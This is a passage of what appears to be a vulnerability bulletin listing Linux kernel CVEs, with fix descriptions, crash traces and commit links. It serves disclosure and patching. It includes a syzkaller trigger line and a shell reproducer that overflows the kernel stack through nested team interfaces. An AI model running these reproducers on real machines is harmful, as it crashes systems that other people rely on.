| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udplite: Fix NULL pointer dereference in __sk_mem_raise_allocated(). syzbot reported [0] a null-ptr-deref in sk_get_rmem0() while using IPPROTO_UDPLITE (0x88): 14:25:52 executing program 1: r0 = socket$inet6(0xa, 0x80002, 0x88) We had a similar report [1] for probably sk_memory_allocated_add() in __sk_mem_raise_allocated(), and commit c915fe13cbaa ("udplite: fix NULL pointer dereference") fixed it by setting .memory_allocated for udplite_prot and udplitev6_prot. To fix the variant, we need to set either .sysctl_wmem_offset or .sysctl_rmem. Now UDP and UDPLITE share the same value for .memory_allocated, so we use the same .sysctl_wmem_offset for UDP and UDPLITE. [0]: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 PID: 6829 Comm: syz-executor.1 Not tainted 6.4.0-rc2-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/28/2023 RIP: 0010:sk_get_rmem0 include/net/sock.h:2907 [inline] RIP: 0010:__sk_mem_raise_allocated+0x806/0x17a0 net/core/sock.c:3006 Code: c1 ea 03 80 3c 02 00 0f 85 23 0f 00 00 48 8b 44 24 08 48 8b 98 38 01 00 00 48 b8 00 00 00 00 00 fc ff df 48 89 da 48 c1 ea 03 <0f> b6 14 02 48 89 d8 83 e0 07 83 c0 03 38 d0 0f 8d 6f 0a 00 00 8b RSP: 0018:ffffc90005d7f450 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffffc90004d92000 RDX: 0000000000000000 RSI: ffffffff88066482 RDI: ffffffff8e2ccbb8 RBP: ffff8880173f7000 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000030000 R13: 0000000000000001 R14: 0000000000000340 R15: 0000000000000001 FS: 0000000000000000(0000) GS:ffff8880b9800000(0063) knlGS:00000000f7f1cb40 CS: 0010 DS: 002b ES: 002b CR0: 0000000080050033 CR2: 000000002e82f000 CR3: 0000000034ff0000 CR4: 00000000003506f0 Call Trace: <TASK> __sk_mem_schedule+0x6c/0xe0 net/core/sock.c:3077 udp_rmem_schedule net/ipv4/udp.c:1539 [inline] __udp_enqueue_schedule_skb+0x776/0xb30 net/ipv4/udp.c:1581 __udpv6_queue_rcv_skb net/ipv6/udp.c:666 [inline] udpv6_queue_rcv_one_skb+0xc39/0x16c0 net/ipv6/udp.c:775 udpv6_queue_rcv_skb+0x194/0xa10 net/ipv6/udp.c:793 __udp6_lib_mcast_deliver net/ipv6/udp.c:906 [inline] __udp6_lib_rcv+0x1bda/0x2bd0 net/ipv6/udp.c:1013 ip6_protocol_deliver_rcu+0x2e7/0x1250 net/ipv6/ip6_input.c:437 ip6_input_finish+0x150/0x2f0 net/ipv6/ip6_input.c:482 NF_HOOK include/linux/netfilter.h:303 [inline] NF_HOOK include/linux/netfilter.h:297 [inline] ip6_input+0xa0/0xd0 net/ipv6/ip6_input.c:491 ip6_mc_input+0x40b/0xf50 net/ipv6/ip6_input.c:585 dst_input include/net/dst.h:468 [inline] ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline] NF_HOOK include/linux/netfilter.h:303 [inline] NF_HOOK include/linux/netfilter.h:297 [inline] ipv6_rcv+0x250/0x380 net/ipv6/ip6_input.c:309 __netif_receive_skb_one_core+0x114/0x180 net/core/dev.c:5491 __netif_receive_skb+0x1f/0x1c0 net/core/dev.c:5605 netif_receive_skb_internal net/core/dev.c:5691 [inline] netif_receive_skb+0x133/0x7a0 net/core/dev.c:5750 tun_rx_batched+0x4b3/0x7a0 drivers/net/tun.c:1553 tun_get_user+0x2452/0x39c0 drivers/net/tun.c:1989 tun_chr_write_iter+0xdf/0x200 drivers/net/tun.c:2035 call_write_iter include/linux/fs.h:1868 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x945/0xd50 fs/read_write.c:584 ksys_write+0x12b/0x250 fs/read_write.c:637 do_syscall_32_irqs_on arch/x86/entry/common.c:112 [inline] __do_fast_syscall_32+0x65/0xf0 arch/x86/entry/common.c:178 do_fast_syscall_32+0x33/0x70 arch/x86/entry/common.c:203 entry_SYSENTER_compat_after_hwframe+0x70/0x82 RIP: 0023:0xf7f21579 Code: b8 01 10 06 03 74 b4 01 10 07 03 74 b0 01 10 08 03 74 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 51 52 55 89 e5 0f 34 cd 80 <5d> 5a 59 c3 90 90 90 90 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54004 | https://git.kernel.org/stable/c/cc56de054d828935aa37734b479f82fa34b5f9bd https://git.kernel.org/stable/c/7e3ae83371a4809da6fa3f10ccc430eecef3034a https://git.kernel.org/stable/c/5014b64e369bdf997935b132a1ac4d64b6e47ad4 https://git.kernel.org/stable/c/387bd0a3af3bdd2b16f8dbef0c9fcccac63000a4 https://git.kernel.org/stable/c/2a112f04629f7839e7cb509b27b8d3b735afe255 https://git.kernel.org/stable/c/f04c8eaf45e7dcdfccba936506b1ec592a369fb9 https://git.kernel.org/stable/c/ad42a35bdfc6d3c0fc4cb4027d7b2757ce665665 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: binder: fix memory leak in binder_init() In binder_init(), the destruction of binder_alloc_shrinker_init() is not performed in the wrong path, which will cause memory leaks. So this commit introduces binder_alloc_shrinker_exit() and calls it in the wrong path to fix that. | 2025-12-24 | not yet calculated | CVE-2023-54005 | https://git.kernel.org/stable/c/486dd742ba186ea333664c517d6775b06b1448ca https://git.kernel.org/stable/c/ceb0f8cc987fb3d25c06b9662e08a42f99651207 https://git.kernel.org/stable/c/b97dad01c12169991f895de3d4f61b8115d12bab https://git.kernel.org/stable/c/d7e5e2b87f5d27469075b6326b6b358e38cd9dcb https://git.kernel.org/stable/c/03eebad96233397f951d8e9fafd82a1674a77284 https://git.kernel.org/stable/c/f11a26633eb6d3bb24a10b1bacc4e4a9b0c6389f https://git.kernel.org/stable/c/ee95051c0c1928051f86198bf5e554277a53b26b https://git.kernel.org/stable/c/adb9743d6a08778b78d62d16b4230346d3508986 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix data-race around unix_tot_inflight. unix_tot_inflight is changed under spin_lock(unix_gc_lock), but unix_release_sock() reads it locklessly. Let's use READ_ONCE() for unix_tot_inflight. Note that the writer side was marked by commit 9d6d7f1cb67c ("af_unix: annote lockless accesses to unix_tot_inflight & gc_in_progress") BUG: KCSAN: data-race in unix_inflight / unix_release_sock write (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1: unix_inflight+0x130/0x180 net/unix/scm.c:64 unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123 unix_scm_to_skb net/unix/af_unix.c:1832 [inline] unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg+0x148/0x160 net/socket.c:747 ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493 ___sys_sendmsg+0xc6/0x140 net/socket.c:2547 __sys_sendmsg+0x94/0x140 net/socket.c:2576 __do_sys_sendmsg net/socket.c:2585 [inline] __se_sys_sendmsg net/socket.c:2583 [inline] __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc read to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0: unix_release_sock+0x608/0x910 net/unix/af_unix.c:671 unix_release+0x59/0x80 net/unix/af_unix.c:1058 __sock_release+0x7d/0x170 net/socket.c:653 sock_close+0x19/0x30 net/socket.c:1385 __fput+0x179/0x5e0 fs/file_table.c:321 ____fput+0x15/0x20 fs/file_table.c:349 task_work_run+0x116/0x1a0 kernel/task_work.c:179 resume_user_mode_work include/linux/resume_user_mode.h:49 [inline] exit_to_user_mode_loop kernel/entry/common.c:171 [inline] exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204 __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline] syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297 do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x72/0xdc value changed: 0x00000000 -> 0x00000001 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 | 2025-12-24 | not yet calculated | CVE-2023-54006 | https://git.kernel.org/stable/c/31b46d5e7c4e295bd112960614a66a177a057dca https://git.kernel.org/stable/c/20aa8325464d8905450089eed96ca102a074d853 https://git.kernel.org/stable/c/5d91b7891f4a9a9d69d75e9f44ab4bf1f3b11840 https://git.kernel.org/stable/c/cf29b42766ad4af2ae6a449f583796951551b48d https://git.kernel.org/stable/c/e5edc6e44a882c0458878ab10eaddfe60ac34e57 https://git.kernel.org/stable/c/2d8933ca863e252fb09ad0be483255e3dfeb1f54 https://git.kernel.org/stable/c/afc284a4a781defbb12b2a40427fae34c3d20e17 https://git.kernel.org/stable/c/ade32bd8a738d7497ffe9743c46728db26740f78 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vmci_host: fix a race condition in vmci_host_poll() causing GPF During fuzzing, a general protection fault is observed in vmci_host_poll(). general protection fault, probably for non-canonical address 0xdffffc0000000019: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x00000000000000c8-0x00000000000000cf] RIP: 0010:__lock_acquire+0xf3/0x5e00 kernel/locking/lockdep.c:4926 <- omitting registers -> Call Trace: <TASK> lock_acquire+0x1a4/0x4a0 kernel/locking/lockdep.c:5672 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xb3/0x100 kernel/locking/spinlock.c:162 add_wait_queue+0x3d/0x260 kernel/sched/wait.c:22 poll_wait include/linux/poll.h:49 [inline] vmci_host_poll+0xf8/0x2b0 drivers/misc/vmw_vmci/vmci_host.c:174 vfs_poll include/linux/poll.h:88 [inline] do_pollfd fs/select.c:873 [inline] do_poll fs/select.c:921 [inline] do_sys_poll+0xc7c/0x1aa0 fs/select.c:1015 __do_sys_ppoll fs/select.c:1121 [inline] __se_sys_ppoll+0x2cc/0x330 fs/select.c:1101 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x4e/0xa0 arch/x86/entry/common.c:82 entry_SYSCALL_64_after_hwframe+0x46/0xb0 Example thread interleaving that causes the general protection fault is as follows: CPU1 (vmci_host_poll) CPU2 (vmci_host_do_init_context) ----- ----- // Read uninitialized context context = vmci_host_dev->context; // Initialize context vmci_host_dev->context = vmci_ctx_create(); vmci_host_dev->ct_type = VMCIOBJ_CONTEXT; if (vmci_host_dev->ct_type == VMCIOBJ_CONTEXT) { // Dereferencing the wrong pointer poll_wait(..., &context->host_context); } In this scenario, vmci_host_poll() reads vmci_host_dev->context first, and then reads vmci_host_dev->ct_type to check that vmci_host_dev->context is initialized. However, since these two reads are not atomically executed, there is a chance of a race condition as described above. To fix this race condition, read vmci_host_dev->context after checking the value of vmci_host_dev->ct_type so that vmci_host_poll() always reads an initialized context. | 2025-12-24 | not yet calculated | CVE-2023-54007 | https://git.kernel.org/stable/c/2053e93ac15519ed1f1fe6eba79a33a4963be4a3 https://git.kernel.org/stable/c/ca0f4ad2b7a36c799213ef0a213eb977a51e03dc https://git.kernel.org/stable/c/85b4aa4eb2e3a0da111fd0a1cdbf00f986ac6b6b https://git.kernel.org/stable/c/770d30b1355c6c8879973dd054fca9168def182c https://git.kernel.org/stable/c/d22b2a35729cb1de311cb650cd67518a24e13fc9 https://git.kernel.org/stable/c/67e35824f861a05b44b19d38e16a83f653bd9d92 https://git.kernel.org/stable/c/ab64bd32b9fac27ff4737d63711b9db5e5462448 https://git.kernel.org/stable/c/ae13381da5ff0e8e084c0323c3cc0a945e43e9c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio_vdpa: build affinity masks conditionally We try to build affinity mask via create_affinity_masks() unconditionally which may lead several issues: - the affinity mask is not used for parent without affinity support (only VDUSE support the affinity now) - the logic of create_affinity_masks() might not work for devices other than block. For example it's not rare in the networking device where the number of queues could exceed the number of CPUs. Such case breaks the current affinity logic which is based on group_cpus_evenly() who assumes the number of CPUs are not less than the number of groups. This can trigger a warning[1]: if (ret >= 0) WARN_ON(nr_present + nr_others < numgrps); Fixing this by only build the affinity masks only when - Driver passes affinity descriptor, driver like virtio-blk can make sure to limit the number of queues when it exceeds the number of CPUs - Parent support affinity setting config ops This help to avoid the warning. More optimizations could be done on top. [1] [ 682.146655] WARNING: CPU: 6 PID: 1550 at lib/group_cpus.c:400 group_cpus_evenly+0x1aa/0x1c0 [ 682.146668] CPU: 6 PID: 1550 Comm: vdpa Not tainted 6.5.0-rc5jason+ #79 [ 682.146671] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [ 682.146673] RIP: 0010:group_cpus_evenly+0x1aa/0x1c0 [ 682.146676] Code: 4c 89 e0 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc e8 1b c4 74 ff 48 89 ef e8 13 ac 98 ff 4c 89 e7 45 31 e4 e8 08 ac 98 ff eb c2 <0f> 0b eb b6 e8 fd 05 c3 00 45 31 e4 eb e5 cc cc cc cc cc cc cc cc [ 682.146679] RSP: 0018:ffffc9000215f498 EFLAGS: 00010293 [ 682.146682] RAX: 000000000001f1e0 RBX: 0000000000000041 RCX: 0000000000000000 [ 682.146684] RDX: ffff888109922058 RSI: 0000000000000041 RDI: 0000000000000030 [ 682.146686] RBP: ffff888109922058 R08: ffffc9000215f498 R09: ffffc9000215f4a0 [ 682.146687] R10: 00000000000198d0 R11: 0000000000000030 R12: ffff888107e02800 [ 682.146689] R13: 0000000000000030 R14: 0000000000000030 R15: 0000000000000041 [ 682.146692] FS: 00007fef52315740(0000) GS:ffff888237380000(0000) knlGS:0000000000000000 [ 682.146695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 682.146696] CR2: 00007fef52509000 CR3: 0000000110dbc004 CR4: 0000000000370ee0 [ 682.146698] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 682.146700] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 682.146701] Call Trace: [ 682.146703] <TASK> [ 682.146705] ? __warn+0x7b/0x130 [ 682.146709] ? group_cpus_evenly+0x1aa/0x1c0 [ 682.146712] ? report_bug+0x1c8/0x1e0 [ 682.146717] ? handle_bug+0x3c/0x70 [ 682.146721] ? exc_invalid_op+0x14/0x70 [ 682.146723] ? asm_exc_invalid_op+0x16/0x20 [ 682.146727] ? group_cpus_evenly+0x1aa/0x1c0 [ 682.146729] ? group_cpus_evenly+0x15c/0x1c0 [ 682.146731] create_affinity_masks+0xaf/0x1a0 [ 682.146735] virtio_vdpa_find_vqs+0x83/0x1d0 [ 682.146738] ? __pfx_default_calc_sets+0x10/0x10 [ 682.146742] virtnet_find_vqs+0x1f0/0x370 [ 682.146747] virtnet_probe+0x501/0xcd0 [ 682.146749] ? vp_modern_get_status+0x12/0x20 [ 682.146751] ? get_cap_addr.isra.0+0x10/0xc0 [ 682.146754] virtio_dev_probe+0x1af/0x260 [ 682.146759] really_probe+0x1a5/0x410 | 2025-12-24 | not yet calculated | CVE-2023-54008 | https://git.kernel.org/stable/c/5f2592243ccd5bb5341f59be409ccfdd586841f3 https://git.kernel.org/stable/c/628b53fc66ca1910a3cb53c3c7e44e59750c3668 https://git.kernel.org/stable/c/ae15aceaa98ad9499763923f7890e345d9f46b60 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i2c: cadence: cdns_i2c_master_xfer(): Fix runtime PM leak on error path The cdns_i2c_master_xfer() function gets a runtime PM reference when the function is entered. This reference is released when the function is exited. There is currently one error path where the function exits directly, which leads to a leak of the runtime PM reference. Make sure that this error path also releases the runtime PM reference. | 2025-12-24 | not yet calculated | CVE-2023-54009 | https://git.kernel.org/stable/c/fd7bf900c3215c77f6d779d1532faa22b79f2430 https://git.kernel.org/stable/c/2d65599ad1e4f195bbb80752cd5cbc2f1a018dba https://git.kernel.org/stable/c/a712b5a95270e62209f5c2201c774f708f75234e https://git.kernel.org/stable/c/d0dc6553b5f2b1272c01b0eba5fe2fd89cc59f44 https://git.kernel.org/stable/c/5b14d7c6ba0ba5d167f5ef588ca6dfe1af6dd0aa https://git.kernel.org/stable/c/ae1664f04f504a998737f5bb563f16b44357bcca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPICA: ACPICA: check null return of ACPI_ALLOCATE_ZEROED in acpi_db_display_objects ACPICA commit 0d5f467d6a0ba852ea3aad68663cbcbd43300fd4 ACPI_ALLOCATE_ZEROED may fail, object_info might be null and will cause null pointer dereference later. | 2025-12-24 | not yet calculated | CVE-2023-54010 | https://git.kernel.org/stable/c/c9fcb2cfcbd4d7018d9f659f5b670f5b727d1968 https://git.kernel.org/stable/c/35d67ffad6f5d78dbd800d354f5334c7b71a19e0 https://git.kernel.org/stable/c/c409eb45f5ddae2e3b3faa76cefc87f3cd0d0e88 https://git.kernel.org/stable/c/978e0d05547ae707d51a942fc7e85a34e181ee6f https://git.kernel.org/stable/c/d997c920a5305b37f0b8a40501b5aca10d099ecd https://git.kernel.org/stable/c/fee6133490091492dc66bcf71479bd53bd17a7d2 https://git.kernel.org/stable/c/ed2e1e85644ca3d351324e9927a538c8af4df654 https://git.kernel.org/stable/c/ae5a0eccc85fc960834dd66e3befc2728284b86c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Fix an issue found by KASAN Write only correct size (32 instead of 64 bytes). | 2025-12-24 | not yet calculated | CVE-2023-54011 | https://git.kernel.org/stable/c/abfe73c16b295f2213e9bfc0a1df232056032448 https://git.kernel.org/stable/c/c8755f913a2fc9c168d108ea8c5af04716e8c4a5 https://git.kernel.org/stable/c/ae7d45f5283d30274039b95d3e6d53d33c66e991 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: fix stack overflow when LRO is disabled for virtual interfaces When the virtual interface's feature is updated, it synchronizes the updated feature for its own lower interface. This propagation logic should be worked as the iteration, not recursively. But it works recursively due to the netdev notification unexpectedly. This problem occurs when it disables LRO only for the team and bonding interface type. team0 | +------+------+-----+-----+ | | | | | team1 team2 team3 ... team200 If team0's LRO feature is updated, it generates the NETDEV_FEAT_CHANGE event to its own lower interfaces(team1 ~ team200). It is worked by netdev_sync_lower_features(). So, the NETDEV_FEAT_CHANGE notification logic of each lower interface work iteratively. But generated NETDEV_FEAT_CHANGE event is also sent to the upper interface too. upper interface(team0) generates the NETDEV_FEAT_CHANGE event for its own lower interfaces again. lower and upper interfaces receive this event and generate this event again and again. So, the stack overflow occurs. But it is not the infinite loop issue. Because the netdev_sync_lower_features() updates features before generating the NETDEV_FEAT_CHANGE event. Already synchronized lower interfaces skip notification logic. So, it is just the problem that iteration logic is changed to the recursive unexpectedly due to the notification mechanism. Reproducer: ip link add team0 type team ethtool -K team0 lro on for i in {1..200} do ip link add team$i master team0 type team ethtool -K team$i lro on done ethtool -K team0 lro off In order to fix it, the notifier_ctx member of bonding/team is introduced. | 2025-12-24 | not yet calculated | CVE-2023-54012 | https://git.kernel.org/stable/c/9ea0c5f90a27b5b884d880e146e0f65f3052e401 https://git.kernel.org/stable/c/4bb955c4d2830a58c08e2a48ab75d75368e3ff36 https://git.kernel.org/stable/c/cf3b5cd7127cc10c5b12400c545f263f0e5e715c https://git.kernel.org/stable/c/ed66e6327a69fec95034cda2ac5b6a57b8b3b622 https://git.kernel.org/stable/c/6bf00bb3dc7e5b9fb05488e11616e65d64e975fa https://git.kernel.org/stable/c/ae9b15fbe63447bc1d3bba3769f409d17ca6fdf6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: interconnect: Fix locking for runpm vs reclaim For cases where icc_bw_set() can be called in call paths that could deadlock against shrinker/reclaim, such as runpm resume, we need to decouple the icc locking. Introduce a new icc_bw_lock for cases where we need to serialize bw aggregation and update to decouple that from paths that require memory allocation such as node/link creation/ destruction. Fixes this lockdep splat: ====================================================== WARNING: possible circular locking dependency detected 6.2.0-rc8-debug+ #554 Not tainted ------------------------------------------------------ ring0/132 is trying to acquire lock: ffffff80871916d0 (&gmu->lock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234 but task is already holding lock: ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #4 (dma_fence_map){++++}-{0:0}: __dma_fence_might_wait+0x74/0xc0 dma_resv_lockdep+0x1f4/0x2f4 do_one_initcall+0x104/0x2bc kernel_init_freeable+0x344/0x34c kernel_init+0x30/0x134 ret_from_fork+0x10/0x20 -> #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}: fs_reclaim_acquire+0x80/0xa8 slab_pre_alloc_hook.constprop.0+0x40/0x25c __kmem_cache_alloc_node+0x60/0x1cc __kmalloc+0xd8/0x100 topology_parse_cpu_capacity+0x8c/0x178 get_cpu_for_node+0x88/0xc4 parse_cluster+0x1b0/0x28c parse_cluster+0x8c/0x28c init_cpu_topology+0x168/0x188 smp_prepare_cpus+0x24/0xf8 kernel_init_freeable+0x18c/0x34c kernel_init+0x30/0x134 ret_from_fork+0x10/0x20 -> #2 (fs_reclaim){+.+.}-{0:0}: __fs_reclaim_acquire+0x3c/0x48 fs_reclaim_acquire+0x54/0xa8 slab_pre_alloc_hook.constprop.0+0x40/0x25c __kmem_cache_alloc_node+0x60/0x1cc __kmalloc+0xd8/0x100 kzalloc.constprop.0+0x14/0x20 icc_node_create_nolock+0x4c/0xc4 icc_node_create+0x38/0x58 qcom_icc_rpmh_probe+0x1b8/0x248 platform_probe+0x70/0xc4 really_probe+0x158/0x290 __driver_probe_device+0xc8/0xe0 driver_probe_device+0x44/0x100 __driver_attach+0xf8/0x108 bus_for_each_dev+0x78/0xc4 driver_attach+0x2c/0x38 bus_add_driver+0xd0/0x1d8 driver_register+0xbc/0xf8 __platform_driver_register+0x30/0x3c qnoc_driver_init+0x24/0x30 do_one_initcall+0x104/0x2bc kernel_init_freeable+0x344/0x34c kernel_init+0x30/0x134 ret_from_fork+0x10/0x20 -> #1 (icc_lock){+.+.}-{3:3}: __mutex_lock+0xcc/0x3c8 mutex_lock_nested+0x30/0x44 icc_set_bw+0x88/0x2b4 _set_opp_bw+0x8c/0xd8 _set_opp+0x19c/0x300 dev_pm_opp_set_opp+0x84/0x94 a6xx_gmu_resume+0x18c/0x804 a6xx_pm_resume+0xf8/0x234 adreno_runtime_resume+0x2c/0x38 pm_generic_runtime_resume+0x30/0x44 __rpm_callback+0x15c/0x174 rpm_callback+0x78/0x7c rpm_resume+0x318/0x524 __pm_runtime_resume+0x78/0xbc adreno_load_gpu+0xc4/0x17c msm_open+0x50/0x120 drm_file_alloc+0x17c/0x228 drm_open_helper+0x74/0x118 drm_open+0xa0/0x144 drm_stub_open+0xd4/0xe4 chrdev_open+0x1b8/0x1e4 do_dentry_open+0x2f8/0x38c vfs_open+0x34/0x40 path_openat+0x64c/0x7b4 do_filp_open+0x54/0xc4 do_sys_openat2+0x9c/0x100 do_sys_open+0x50/0x7c __arm64_sys_openat+0x28/0x34 invoke_syscall+0x8c/0x128 el0_svc_common.constprop.0+0xa0/0x11c do_el0_ ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54013 | https://git.kernel.org/stable/c/2f3a124696d43de3c837f87a9f767c56ee86cf2a https://git.kernel.org/stable/c/af42269c3523492d71ebbe11fefae2653e9cdc78 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Check valid rport returned by fc_bsg_to_rport() Klocwork reported warning of rport maybe NULL and will be dereferenced. rport returned by call to fc_bsg_to_rport() could be NULL and dereferenced. Check valid rport returned by fc_bsg_to_rport(). | 2025-12-24 | not yet calculated | CVE-2023-54014 | https://git.kernel.org/stable/c/f35bd94b4e11c41de90cd0fa72c9062e8196822f https://git.kernel.org/stable/c/ccd3bc595bda67db5a347b9050c2df28f292d3fb https://git.kernel.org/stable/c/1b7e5bdf2be22ae8c61bdca5a5f96ec2746e9639 https://git.kernel.org/stable/c/921d6844625527a92d1178262a633cc88a8e61bd https://git.kernel.org/stable/c/1ccd52b790a66b8b5f75c87eab8c3a37f941a2bf https://git.kernel.org/stable/c/e466930717ef18c112585a39fc6174d8eb441df5 https://git.kernel.org/stable/c/ced5460eae772e847debbc0b65ef93aedab92d3f https://git.kernel.org/stable/c/af73f23a27206ffb3c477cac75b5fcf03410556e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Devcom, fix error flow in mlx5_devcom_register_device In case devcom allocation is failed, mlx5 is always freeing the priv. However, this priv might have been allocated by a different thread, and freeing it might lead to use-after-free bugs. Fix it by freeing the priv only in case it was allocated by the running thread. | 2025-12-24 | not yet calculated | CVE-2023-54015 | https://git.kernel.org/stable/c/3dfc1004d9afbf689087ae1eafd88f55481984c7 https://git.kernel.org/stable/c/d4d10a6df1529b3f446cdada5c25e065f4712756 https://git.kernel.org/stable/c/1e755065368000205e6683fa924b2654e99f573b https://git.kernel.org/stable/c/eaa365c10459052cbe3e44caa4ad760cb93bd435 https://git.kernel.org/stable/c/a3a516caef2c5be2f4d171890a8b3415bfab4e5e https://git.kernel.org/stable/c/af87194352cad882d787d06fb7efa714acd95427 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Fix memory leak in rx_desc and tx_desc Currently when ath12k_dp_cc_desc_init() is called we allocate memory to rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), during descriptor cleanup rx_descs and tx_descs memory is not freed. This is cause of memory leak. These allocated memory should be freed in ath12k_dp_cc_cleanup. In ath12k_dp_cc_desc_init(), we can save base address of rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), we can free rx_descs and tx_descs memory using their base address. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1 | 2025-12-24 | not yet calculated | CVE-2023-54016 | https://git.kernel.org/stable/c/e16be2d34883eecfe7fd888fcdb76c7a5db5d187 https://git.kernel.org/stable/c/afb522b36e76acaa9f8fc06d0a9742d841c47c16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries: fix possible memory leak in ibmebus_bus_init() If device_register() returns error in ibmebus_bus_init(), name of kobject which is allocated in dev_set_name() called in device_add() is leaked. As comment of device_add() says, it should call put_device() to drop the reference count that was set in device_initialize() when it fails, so the name can be freed in kobject_cleanup(). | 2025-12-24 | not yet calculated | CVE-2023-54017 | https://git.kernel.org/stable/c/e4ff88548defafb1ef84facd9856ec252da7b008 https://git.kernel.org/stable/c/3cc4c2f6c266fe5b33a7fa797f31e8b3f06ce58c https://git.kernel.org/stable/c/7ffe14fce7425c32e735bdc44bce425f18976a49 https://git.kernel.org/stable/c/9f3b2b666833ebef6d0ce5a40e189f38e70342a1 https://git.kernel.org/stable/c/d35e7ae10eb8917883da2a0b1823c620a1be42d6 https://git.kernel.org/stable/c/96f27ff732208dce6468016e7a7d5032bd1bfc23 https://git.kernel.org/stable/c/ebd8dc974fcc59e2851a0d89ee7935b55142dc8e https://git.kernel.org/stable/c/afda85b963c12947e298ad85d757e333aa40fd74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/hdmi: Add missing check for alloc_ordered_workqueue Add check for the return value of alloc_ordered_workqueue as it may return NULL pointer and cause NULL pointer dereference in `hdmi_hdcp.c` and `hdmi_hpd.c`. Patchwork: https://patchwork.freedesktop.org/patch/517211/ | 2025-12-24 | not yet calculated | CVE-2023-54018 | https://git.kernel.org/stable/c/b479485b24da1d572a0ce875537af31b02d2f915 https://git.kernel.org/stable/c/392f7eb3946ab3780b931af723033e19f82c9134 https://git.kernel.org/stable/c/fc34608fa275fe6b3b17e171b63b8ca3aa1cbf09 https://git.kernel.org/stable/c/1bab31a0969ca4ac90907a5d3b44af104229eafd https://git.kernel.org/stable/c/9a01ecc312e764ec4527ad49105a3ca799f1860c https://git.kernel.org/stable/c/e55f93d674314f2fb69eba0dc24acfdf72805611 https://git.kernel.org/stable/c/ae5ca116a0c0ba9fc4123b1f1ec3c4f4d0d01b3f https://git.kernel.org/stable/c/afe4cb96153a0d8003e4e4ebd91b5c543e10df84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/psi: use kernfs polling functions for PSI trigger polling Destroying psi trigger in cgroup_file_release causes UAF issues when a cgroup is removed from under a polling process. This is happening because cgroup removal causes a call to cgroup_file_release while the actual file is still alive. Destroying the trigger at this point would also destroy its waitqueue head and if there is still a polling process on that file accessing the waitqueue, it will step on the freed pointer: do_select vfs_poll do_rmdir cgroup_rmdir kernfs_drain_open_files cgroup_file_release cgroup_pressure_release psi_trigger_destroy wake_up_pollfree(&t->event_wait) // vfs_poll is unblocked synchronize_rcu kfree(t) poll_freewait -> UAF access to the trigger's waitqueue head Patch [1] fixed this issue for epoll() case using wake_up_pollfree(), however the same issue exists for synchronous poll() case. The root cause of this issue is that the lifecycles of the psi trigger's 